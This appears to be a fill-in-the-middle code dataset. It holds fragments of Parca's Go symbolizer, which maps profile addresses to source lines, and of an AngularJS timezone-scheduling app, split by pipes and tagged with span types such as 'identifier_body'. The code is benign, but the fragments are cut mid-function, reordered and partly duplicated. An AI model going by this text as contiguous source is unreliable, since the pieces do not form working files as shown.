case quality.HasGoPclntab:
lnr, err := addr2line.Go(s.logger, filepath, f)
if err != nil {
return nil, fmt.Errorf("failed to create Go liner: %w", err)
}
return lnr, nil
// TODO CHECK plt
case quality.HasSymtab || quality.HasDynsym:
lnr, err := addr2line.Symbols(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create Symtab liner: %w", err)
}
return lnr, nil
default:
return nil, ErrLinerFailed
}
}
// pcToLines returns the line number of the given PC while keeping the track of symbolization attempts and failures.
func (s *Symbolizer) pcToLines(liner liner, key string, addr uint64) []profile.LocationLine {
lines, err := liner.PCToLines(addr)
level.Debug(s.logger).Log("msg", "symbolized location", "build_id", key, "address", addr, "lines_count", len(lines), "err", err, "liner_type", fmt.Sprintf("%T", liner))
if err != nil {
// Error bookkeeping.
if prev, ok := s.symbolizationAttempts[key][addr]; ok {
prev++
if prev >= s.attemptThreshold {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
} else {
s.symbolizationAttempts[key][addr] = prev
}
return nil
}
// First failed attempt.
s.symbolizationAttempts[key] = map[uint64]int{addr: 1}
return nil
}
if len(lines) == 0 {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
}
return lines
}
| {
locationsToSymbolize++
continue
} | conditional_block |
symbolizer.go | // Copyright 2022-2023 The Parca Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package symbolizer
import (
"context"
"debug/elf"
"errors"
"fmt"
"io"
"os"
"path/filepath"
"strings"
"time"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
debuginfopb "github.com/parca-dev/parca/gen/proto/go/parca/debuginfo/v1alpha1"
pb "github.com/parca-dev/parca/gen/proto/go/parca/metastore/v1alpha1"
"github.com/parca-dev/parca/pkg/debuginfo"
"github.com/parca-dev/parca/pkg/profile"
"github.com/parca-dev/parca/pkg/runutil"
"github.com/parca-dev/parca/pkg/symbol/addr2line"
"github.com/parca-dev/parca/pkg/symbol/demangle"
"github.com/parca-dev/parca/pkg/symbol/elfutils"
)
var (
ErrNotValidElf = errors.New("not a valid ELF file")
ErrNoDebuginfo = errors.New("no debug info found")
ErrLinerFailed = errors.New("liner creation failed")
)
type DebuginfoMetadata interface {
SetQuality(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType, quality *debuginfopb.DebuginfoQuality) error
Fetch(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType) (*debuginfopb.Debuginfo, error)
}
// liner is the interface implemented by symbolizers
// which read an object file (symbol table or debug information) and return
// source code lines by a given memory address.
type liner interface {
PCToLines(pc uint64) ([]profile.LocationLine, error)
PCRange() ([2]uint64, error)
Close() error
File() string
}
type Option func(*Symbolizer)
func WithAttemptThreshold(t int) Option |
func WithDemangleMode(mode string) Option {
return func(s *Symbolizer) {
s.demangler = demangle.NewDemangler(mode, false)
}
}
type Symbolizer struct {
logger log.Logger
// attempts counts the total number of symbolication attempts.
// It counts per batch.
attempts prometheus.Counter
// errors counts the total number of symbolication errors, partitioned by an error reason
// such as failure to fetch unsymbolized locations.
// It counts per batch.
errors *prometheus.CounterVec
// duration is a histogram to measure how long it takes to finish a symbolication round.
// Note, a single observation is per batch.
duration prometheus.Histogram
// storeDuration is a histogram to measure how long it takes to store the symbolized locations.
// Note, a single observation is per batch.
storeDuration prometheus.Histogram
metastore pb.MetastoreServiceClient
debuginfo DebuginfoFetcher
metadata DebuginfoMetadata
demangler *demangle.Demangler
attemptThreshold int
linerCreationFailed map[string]struct{}
symbolizationAttempts map[string]map[uint64]int
symbolizationFailed map[string]map[uint64]struct{}
pcRanges map[string][2]uint64
linerCache map[string]liner
batchSize uint32
tmpDir string
}
type DebuginfoFetcher interface {
// Fetch ensures that the debug info for the given build ID is available on
// a local filesystem and returns a path to it.
FetchDebuginfo(ctx context.Context, dbginfo *debuginfopb.Debuginfo) (io.ReadCloser, error)
}
func New(
logger log.Logger,
reg prometheus.Registerer,
metadata DebuginfoMetadata,
metastore pb.MetastoreServiceClient,
debuginfo DebuginfoFetcher,
tmpDir string,
batchSize uint32,
opts ...Option,
) *Symbolizer {
attemptsTotal := promauto.With(reg).NewCounter(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_attempts_total",
Help: "Total number of symbolication attempts in batches.",
},
)
errorsTotal := promauto.With(reg).NewCounterVec(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_errors_total",
Help: "Total number of symbolication errors in batches, partitioned by an error reason.",
},
[]string{"reason"},
)
duration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_symbolication_duration_seconds",
Help: "How long it took in seconds to finish a round of the symbolication cycle in batches.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
storeDuration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_store_duration_seconds",
Help: "How long it took in seconds to store a batch of the symbolized locations.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
const (
defaultDemangleMode = "simple"
defaultAttemptThreshold = 3
)
s := &Symbolizer{
logger: log.With(logger, "component", "symbolizer"),
attempts: attemptsTotal,
errors: errorsTotal,
duration: duration,
storeDuration: storeDuration,
metastore: metastore,
debuginfo: debuginfo,
tmpDir: tmpDir,
batchSize: batchSize,
metadata: metadata,
demangler: demangle.NewDemangler(defaultDemangleMode, false),
attemptThreshold: defaultAttemptThreshold,
linerCreationFailed: map[string]struct{}{},
symbolizationAttempts: map[string]map[uint64]int{},
symbolizationFailed: map[string]map[uint64]struct{}{},
pcRanges: map[string][2]uint64{},
}
for _, opt := range opts {
opt(s)
}
return s
}
func (s *Symbolizer) Run(ctx context.Context, interval time.Duration) error {
return runutil.Repeat(interval, ctx.Done(), func() error {
level.Debug(s.logger).Log("msg", "start symbolization cycle")
s.runSymbolizationCycle(ctx)
level.Debug(s.logger).Log("msg", "symbolization loop completed")
return nil
})
}
func (s *Symbolizer) runSymbolizationCycle(ctx context.Context) {
var begin time.Time
prevMaxKey := ""
for {
begin = time.Now()
s.attempts.Inc()
lres, err := s.metastore.UnsymbolizedLocations(ctx, &pb.UnsymbolizedLocationsRequest{
Limit: s.batchSize,
MinKey: prevMaxKey,
})
if err != nil {
level.Error(s.logger).Log("msg", "failed to fetch unsymbolized locations", "err", err)
s.errors.WithLabelValues("fetch_unsymbolized_locations").Inc()
s.duration.Observe(time.Since(begin).Seconds())
// Try again on the next cycle.
return
}
if len(lres.Locations) == 0 {
s.duration.Observe(time.Since(begin).Seconds())
// Nothing to symbolize.
return
}
prevMaxKey = lres.MaxKey
err = s.Symbolize(ctx, lres.Locations)
if err != nil {
level.Debug(s.logger).Log("msg", "errors occurred during symbolization", "err", err)
}
s.duration.Observe(time.Since(begin).Seconds())
if s.batchSize == 0 {
// If batch size is 0 we won't continue with the next batch as we
// should have already processed everything.
return
}
}
}
// UnsymbolizableMapping returns true if a mapping points to a binary for which
// locations can't be symbolized in principle, at least now. Examples are
// "[vdso]", [vsyscall]" and some others, see the code.
func UnsymbolizableMapping(m *pb.Mapping) bool {
name := filepath.Base(m.File)
return strings.HasPrefix(name, "[") || strings.HasPrefix(name, "linux-vdso") || strings.HasPrefix(m.File, "/dev/dri/")
}
type MappingLocations struct {
Mapping *pb.Mapping
Locations []*pb.Location
// LocationsLines is a list of lines per location.
LocationsLines [][]profile.LocationLine
}
func (s *Symbolizer) Symbolize(ctx context.Context, locations []*pb.Location) error {
mappingsIndex := map[string]int{}
mappingIDs := []string{}
for _, loc := range locations {
if _, ok := mappingsIndex[loc.MappingId]; !ok {
mappingIDs = append(mappingIDs, loc.MappingId)
mappingsIndex[loc.MappingId] = len(mappingIDs) - 1
}
}
mres, err := s.metastore.Mappings(ctx, &pb.MappingsRequest{MappingIds: mappingIDs})
if err != nil {
s.errors.WithLabelValues("get_mappings").Inc()
return fmt.Errorf("get mappings: %w", err)
}
// Aggregate locations per mapping to get prepared for batch request.
locationsByMappings := make([]*MappingLocations, len(mres.Mappings))
for i, m := range mres.Mappings {
locationsByMappings[i] = &MappingLocations{Mapping: m}
}
for _, loc := range locations {
locationsByMapping := locationsByMappings[mappingsIndex[loc.MappingId]]
// Already symbolized!
if loc.Lines != nil && len(loc.Lines) > 0 {
level.Debug(s.logger).Log("msg", "location already symbolized, skipping")
continue
}
locationsByMapping.Locations = append(locationsByMapping.Locations, loc)
}
newLinerCache := map[string]liner{}
for _, locationsByMapping := range locationsByMappings {
mapping := locationsByMapping.Mapping
// If Mapping or Mapping.BuildID is empty, we cannot associate an object file with functions.
if mapping == nil || len(mapping.BuildId) == 0 || UnsymbolizableMapping(mapping) {
level.Debug(s.logger).Log("msg", "mapping of location is empty, skipping")
continue
}
logger := log.With(s.logger, "buildid", mapping.BuildId)
var liner liner
locations := locationsByMapping.Locations
// Symbolize returns a list of lines per location passed to it.
locationsByMapping.LocationsLines, liner, err = s.symbolizeLocationsForMapping(ctx, mapping, locations)
if err != nil {
level.Debug(logger).Log("msg", "storage symbolization request failed", "err", err)
continue
}
if liner != nil {
newLinerCache[mapping.BuildId] = liner
}
}
for k := range newLinerCache {
delete(s.linerCache, k)
}
for _, liner := range s.linerCache {
// These are liners that didn't show up in the latest iteration.
if err := liner.Close(); err != nil {
level.Debug(s.logger).Log("msg", "failed to close liner", "err", err)
}
if err := os.Remove(liner.File()); err != nil {
level.Debug(s.logger).Log("msg", "failed to remove liner file", "err", err)
}
}
s.linerCache = newLinerCache
numFunctions := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
numFunctions += len(locationLines)
}
}
if numFunctions == 0 {
return nil
}
functions := make([]*pb.Function, numFunctions)
numLocations := 0
i := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
numLocations++
for _, line := range locationLines {
functions[i] = line.Function
i++
}
}
}
fres, err := s.metastore.GetOrCreateFunctions(ctx, &pb.GetOrCreateFunctionsRequest{Functions: functions})
if err != nil {
s.errors.WithLabelValues("get_or_create_functions").Inc()
return fmt.Errorf("get or create functions: %w", err)
}
locations = make([]*pb.Location, 0, numLocations)
i = 0
for _, locationsByMapping := range locationsByMappings {
for j, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
lines := make([]*pb.Line, 0, len(locationLines))
for _, line := range locationLines {
lines = append(lines, &pb.Line{
FunctionId: fres.Functions[i].Id,
Line: line.Line,
})
i++
}
// Update the location with the lines in-place so that in the next
// step we can just reuse the same locations as were originally
// passed in.
locations = append(locations, locationsByMapping.Locations[j])
locationsByMapping.Locations[j].Lines = lines
}
}
// At this point the locations are symbolized in-place and we can send them to the metastore.
defer func(begin time.Time) {
s.storeDuration.Observe(time.Since(begin).Seconds())
}(time.Now())
_, err = s.metastore.CreateLocationLines(ctx, &pb.CreateLocationLinesRequest{
Locations: locations,
})
if err != nil {
s.errors.WithLabelValues("create_location_lines").Inc()
return fmt.Errorf("create location lines: %w", err)
}
return nil
}
// symbolizeLocationsForMapping fetches the debug info for a given build ID and symbolizes it the
// given location.
func (s *Symbolizer) symbolizeLocationsForMapping(ctx context.Context, m *pb.Mapping, locations []*pb.Location) ([][]profile.LocationLine, liner, error) {
dbginfo, err := s.metadata.Fetch(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED)
if err != nil {
return nil, nil, fmt.Errorf("fetching metadata: %w", err)
}
if dbginfo.Quality != nil {
if dbginfo.Quality.NotValidElf {
return nil, nil, ErrNotValidElf
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check previously reported debuginfo quality: %w", ErrNoDebuginfo)
}
}
key := dbginfo.BuildId
countLocationsToSymbolize := s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
pcRange := s.pcRanges[key]
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), nil, nil
}
liner, found := s.linerCache[key]
if !found {
switch dbginfo.Source {
case debuginfopb.Debuginfo_SOURCE_UPLOAD:
if dbginfo.Upload.State != debuginfopb.DebuginfoUpload_STATE_UPLOADED {
return nil, nil, debuginfo.ErrNotUploadedYet
}
case debuginfopb.Debuginfo_SOURCE_DEBUGINFOD:
// Nothing to do here, just covering all cases.
default:
return nil, nil, debuginfo.ErrUnknownDebuginfoSource
}
// Fetch the debug info for the build ID.
rc, err := s.debuginfo.FetchDebuginfo(ctx, dbginfo)
if err != nil {
return nil, nil, fmt.Errorf("fetch debuginfo (BuildID: %q): %w", m.BuildId, err)
}
defer func() {
if err := rc.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo reader", "err", err)
}
}()
f, err := os.CreateTemp(s.tmpDir, "parca-symbolizer-*")
if err != nil {
return nil, nil, fmt.Errorf("create temp file: %w", err)
}
defer func() {
if err := f.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
if err := os.Remove(f.Name()); err != nil {
level.Error(s.logger).Log("msg", "failed to remove debuginfo file", "err", err)
}
}()
_, err = io.Copy(f, rc)
if err != nil {
return nil, nil, fmt.Errorf("copy debuginfo to temp file: %w", err)
}
e, err := elf.Open(f.Name())
if err != nil {
if merr := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, &debuginfopb.DebuginfoQuality{
NotValidElf: true,
}); merr != nil {
level.Error(s.logger).Log("msg", "failed to set metadata quality", "err", merr)
}
return nil, nil, fmt.Errorf("open temp file as ELF: %w", err)
}
defer func() {
if err := e.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
}()
if dbginfo.Quality == nil {
dbginfo.Quality = &debuginfopb.DebuginfoQuality{
HasDwarf: elfutils.HasDWARF(e),
HasGoPclntab: elfutils.HasGoPclntab(e),
HasSymtab: elfutils.HasSymtab(e),
HasDynsym: elfutils.HasDynsym(e),
}
if err := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, dbginfo.Quality); err != nil {
return nil, nil, fmt.Errorf("set quality: %w", err)
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check debuginfo quality: %w", ErrNoDebuginfo)
}
}
liner, err = s.newLiner(f.Name(), e, dbginfo.Quality)
if err != nil {
return nil, nil, fmt.Errorf("new liner: %w", err)
}
}
pcRange, found := s.pcRanges[key]
if !found {
pcRange, err = liner.PCRange()
if err != nil {
return nil, liner, fmt.Errorf("get pc range: %w", err)
}
s.pcRanges[key] = pcRange
}
countLocationsToSymbolize = s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), liner, nil
}
level.Debug(s.logger).Log("msg", "symbolizing locations", "build_id", m.BuildId, "count", countLocationsToSymbolize)
locationsLines := make([][]profile.LocationLine, len(locations))
for i, loc := range locations {
// Check if we already attempt to symbolize this location and failed.
// No need to try again.
if _, failedBefore := s.symbolizationFailed[dbginfo.BuildId][loc.Address]; failedBefore {
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsLines[i] = s.pcToLines(liner, key, loc.Address)
}
}
return locationsLines, liner, nil
}
func (s *Symbolizer) countLocationsToSymbolize(key string, locations []*pb.Location) int {
locationsToSymbolize := 0
for _, loc := range locations {
if _, failedBefore := s.symbolizationFailed[key][loc.Address]; failedBefore {
continue
}
pcRange, found := s.pcRanges[key]
if !found {
locationsToSymbolize++
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsToSymbolize++
}
}
return locationsToSymbolize
}
// newLiner creates a new liner for the given mapping and object file path.
func (s *Symbolizer) newLiner(filepath string, f *elf.File, quality *debuginfopb.DebuginfoQuality) (liner, error) {
switch {
case quality.HasDwarf:
lnr, err := addr2line.DWARF(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create DWARF liner: %w", err)
}
return lnr, nil
case quality.HasGoPclntab:
lnr, err := addr2line.Go(s.logger, filepath, f)
if err != nil {
return nil, fmt.Errorf("failed to create Go liner: %w", err)
}
return lnr, nil
// TODO CHECK plt
case quality.HasSymtab || quality.HasDynsym:
lnr, err := addr2line.Symbols(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create Symtab liner: %w", err)
}
return lnr, nil
default:
return nil, ErrLinerFailed
}
}
// pcToLines returns the line number of the given PC while keeping the track of symbolization attempts and failures.
func (s *Symbolizer) pcToLines(liner liner, key string, addr uint64) []profile.LocationLine {
lines, err := liner.PCToLines(addr)
level.Debug(s.logger).Log("msg", "symbolized location", "build_id", key, "address", addr, "lines_count", len(lines), "err", err, "liner_type", fmt.Sprintf("%T", liner))
if err != nil {
// Error bookkeeping.
if prev, ok := s.symbolizationAttempts[key][addr]; ok {
prev++
if prev >= s.attemptThreshold {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
} else {
s.symbolizationAttempts[key][addr] = prev
}
return nil
}
// First failed attempt.
s.symbolizationAttempts[key] = map[uint64]int{addr: 1}
return nil
}
if len(lines) == 0 {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
}
return lines
}
| {
return func(s *Symbolizer) {
s.attemptThreshold = t
}
} | identifier_body |
app.js | 'use struct';
/* global moment */
var timesched = angular
.module('timesched', ['ui.bootstrap', 'ui.sortable', 'ui.slider'])
.config(function($locationProvider) {
$locationProvider.html5Mode(true);
});
(function() {
var SELECTABLES = [];
var SELECTABLES_BY_NAME = {};
var SELECTABLES_BY_KEY = {};
function normalizeZoneName(zoneName) {
return zoneName.toLowerCase().replace(/^\s+|\s+$/g, '');
}
function zoneExists(input) {
return !!SELECTABLES_BY_NAME[normalizeZoneName(input)];
}
function lookupTimeZoneState(input) {
var zone = SELECTABLES_BY_NAME[normalizeZoneName(input)];
if (!zone) {
zone = SELECTABLES_BY_KEY[input];
if (!zone)
return null;
}
var m;
try {
m = moment.tz(normalizeZoneName(zone.z));
} catch (e) {
}
return m !== null ? new TimeZoneState(m, zone) : null;
}
timesched.setTimezoneData = function(data) {
SELECTABLES = [];
SELECTABLES_BY_NAME = {};
SELECTABLES_BY_KEY = {};
for (var i = 0; i < data.selectables.length; i++) {
var sel = data.selectables[i];
SELECTABLES.push(sel);
SELECTABLES_BY_NAME[sel.d.toLowerCase()] = sel;
SELECTABLES_BY_KEY[sel.k] = sel; | }
};
function TimeZoneState(m, zone) {
this.tz = m.tz();
this.urlKey = zone.k;
this.offset = 0;
this.timezoneShortName = zone.n;
this.timezoneName = zone.d;
this.update();
}
TimeZoneState.prototype.update = function(day, homeZone) {
var reftz = homeZone ? homeZone.tz : this.tz;
var start = moment.tz(day, reftz).startOf('day');
var ptr = start.clone().tz(this.tz);
var offset = (start.zone() - ptr.zone()) / 60;
this.dayStart = ptr.clone();
this.homeOffset = (offset > 0 ? '+' : '') + offset;
this.timezoneOffsetInfo = ptr.format('[UTC] Z');
this.utcOffset = ptr.zone();
this.timezoneAbbr = ptr.format('z');
this.isHome = homeZone && homeZone.tz === this.tz;
this.timeCells = [];
for (var i = 0; i < 24; i++) {
if (i !== 0)
ptr.add('hours', 1);
this.timeCells.push({
hour: parseInt(ptr.format('H'), 10),
hourFormat: ptr.format('H'),
minute: parseInt(ptr.format('m'), 10),
minuteFormat: ptr.format('mm'),
tooltip: ptr.format('LLLL (z)')
});
}
if (ptr.zone() !== this.utcOffset) {
var endAbbr = ptr.format('z');
var endOffsetInfo = ptr.format('[UTC] Z');
if (endAbbr != this.timezoneAbbr)
this.timezoneAbbr += '/' + endAbbr;
if (endOffsetInfo != this.timezoneOffsetInfo)
this.timezoneOffsetInfo += '/' + endOffsetInfo;
}
this.updateClock();
};
TimeZoneState.prototype.updateClock = function() {
var now = moment.tz(this.tz);
var oldH = this.clockHour;
var oldM = this.clockMinute;
this.clockHour = now.format('H');
this.clockMinute = now.format('mm');
return this.clockHour !== oldH || this.clockMinute !== oldM;
};
timesched.controller('TimezoneCtrl', function($scope, $location, datepickerConfig) {
$scope.day = new Date();
$scope.isToday = true;
$scope.zones = [];
$scope.homeZone = null;
$scope.currentZone = null;
$scope.ready = false;
$scope.timeRange = [40, 68];
$scope.scheduleMeeting = false;
$scope.meetingSummary = '';
// make the datepicker show monday by default
datepickerConfig.startingDay = 1;
$scope.addInputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
if (params.tz != $location.search.tz ||
params.date != $location.search.date ||
params.range != $location.search.range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
for (var i = 0; i < zones.length; i++) {
var zoneName = zones[i];
if (zoneName[zoneName.length - 1] == '!') {
zoneName = zoneName.substr(0, zoneName.length - 1);
homeZone = zoneName;
}
allZones.push(zoneName);
}
if (params.date) {
var newDate = moment(params.date, 'YYYY-MM-DD');
if (!moment(newDate).isSame(moment($scope.day))) {
$scope.day = newDate.toDate();
dateChanged = true;
}
}
if (params.range) {
var rangePieces = params.range.split(',');
$scope.timeRange = [parseInt(rangePieces[0], 10),
parseInt(rangePieces[1], 10)];
$scope.scheduleMeeting = true;
} else {
$scope.scheduleMeeting = false;
}
if (dateChanged || $scope.zonesDifferInURL(allZones)) {
$scope.homeZone = null;
$scope.zones = [];
if (homeZone === null && allZones.length > 0)
homeZone = allZones[0];
if (homeZone !== null)
$scope.addZone(homeZone);
for (i = 0; i < allZones.length; i++) {
if (allZones[i] !== homeZone)
$scope.addZone(allZones[i]);
}
$scope.sortByFunc(function(a, b) {
var idx1 = allZones.indexOf(a.urlKey);
var idx2 = allZones.indexOf(b.urlKey);
return idx1 - idx2;
});
$scope.checkForToday();
}
};
$scope.$on('$locationChangeSuccess', $scope.syncWithURL);
window.setTimeout(function() {
$scope.ready = true;
$scope.syncWithURL();
$('div.loading').hide();
$('div.contentwrapper').fadeIn('slow', function() {
window.setInterval(function() {
if ($scope.updateClocks())
$scope.$apply();
}, 1000);
});
}, 100);
});
timesched.directive('timezone', function() {
return {
restrict: 'ACE',
require: 'ngModel',
scope: {
datasets: '=',
ngModel: '='
},
link: function(scope, elm, attrs, ctrl) {
var localChange = false;
elm.typeahead({
name: 'timezone',
local: SELECTABLES,
valueKey: 'd',
engine: {compile: function() {
return {
render: function(context) {
var time;
try {
time = moment.tz(context.z).format('HH:mm');
} catch (e) {
time = '??:??';
}
return '<p>' + context.d + '\u00a0<em>' + time + '</em></p>';
}
};
}},
template: 'dummy'
});
function updateScope() {
var oldVal = elm.val();
scope.$apply(function() {
localChange = true;
scope.ngModel = elm.val();
});
elm.val(oldVal);
}
elm.on('typeahead:selected', function() {
ctrl.$setValidity('timezone', true);
updateScope();
elm.trigger('submit');
});
elm.on('typeahead:autocompleted', updateScope);
elm.bind('input', function() {
scope.$apply(function() {
var value = elm.val();
if (zoneExists(value)) {
localChange = true;
ctrl.$setValidity('timezone', true);
scope.ngModel = value;
} else {
ctrl.$setValidity('timezone', false);
}
});
});
scope.$watch('ngModel', function(newVal) {
if (localChange) {
localChange = false;
return;
}
elm.typeahead('setQuery', newVal || '');
}, true);
scope.$on('$destroy', function() {
elm.typeahead('destroy');
});
}
};
});
})(); | random_line_split |
|
app.js | 'use struct';
/* global moment */
var timesched = angular
.module('timesched', ['ui.bootstrap', 'ui.sortable', 'ui.slider'])
.config(function($locationProvider) {
$locationProvider.html5Mode(true);
});
(function() {
var SELECTABLES = [];
var SELECTABLES_BY_NAME = {};
var SELECTABLES_BY_KEY = {};
function normalizeZoneName(zoneName) |
function zoneExists(input) {
return !!SELECTABLES_BY_NAME[normalizeZoneName(input)];
}
function lookupTimeZoneState(input) {
var zone = SELECTABLES_BY_NAME[normalizeZoneName(input)];
if (!zone) {
zone = SELECTABLES_BY_KEY[input];
if (!zone)
return null;
}
var m;
try {
m = moment.tz(normalizeZoneName(zone.z));
} catch (e) {
}
return m !== null ? new TimeZoneState(m, zone) : null;
}
timesched.setTimezoneData = function(data) {
SELECTABLES = [];
SELECTABLES_BY_NAME = {};
SELECTABLES_BY_KEY = {};
for (var i = 0; i < data.selectables.length; i++) {
var sel = data.selectables[i];
SELECTABLES.push(sel);
SELECTABLES_BY_NAME[sel.d.toLowerCase()] = sel;
SELECTABLES_BY_KEY[sel.k] = sel;
}
};
function TimeZoneState(m, zone) {
this.tz = m.tz();
this.urlKey = zone.k;
this.offset = 0;
this.timezoneShortName = zone.n;
this.timezoneName = zone.d;
this.update();
}
TimeZoneState.prototype.update = function(day, homeZone) {
var reftz = homeZone ? homeZone.tz : this.tz;
var start = moment.tz(day, reftz).startOf('day');
